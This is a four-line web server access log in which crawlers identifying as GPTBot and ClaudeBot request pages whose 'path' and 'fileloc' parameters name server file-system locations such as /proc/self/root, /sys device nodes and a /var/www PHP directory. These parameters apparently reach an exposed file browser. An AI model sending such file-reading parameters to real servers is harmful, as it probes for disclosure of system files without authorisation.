74.7.227.189 - - [10/Nov/2025:00:25:58 +0000] "GET /?path=//sys/bus/node/devices/node0/memory5/subsystem/devices/memory10/node0/cpu0/driver/cpu0/firmware_node HTTP/1.1" 200 3384 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.50 - - [10/Nov/2025:00:25:58 +0000] "GET /our-works/tvc-caltex-havoline?fileloc=%2F%2Fproc%2Fself%2Froot%2Fproc%2Fself%2Froot%2Fusr%2Fshare%2Fdoc%2Fpython3-attr%2Fcopyright&path=%2F%2Fproc%2Fself%2Froot%2Fproc%2Fself%2Froot%2Fusr%2Fshare%2Fdoc%2Fpython3-attr HTTP/1.1" 200 3503 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.227.51 - - [10/Nov/2025:00:25:59 +0000] "GET /236wlk4300.html?path=/var/www/lamphim/data/php-bin HTTP/1.1" 200 2695 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.189 - - [10/Nov/2025:00:25:59 +0000] "GET /?path=//sys/bus/node/devices/node0/memory1/subsystem/devices/memory14/node0/cpu1/driver/cpu0/firmware_node/power HTTP/1.1" 200 3387 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
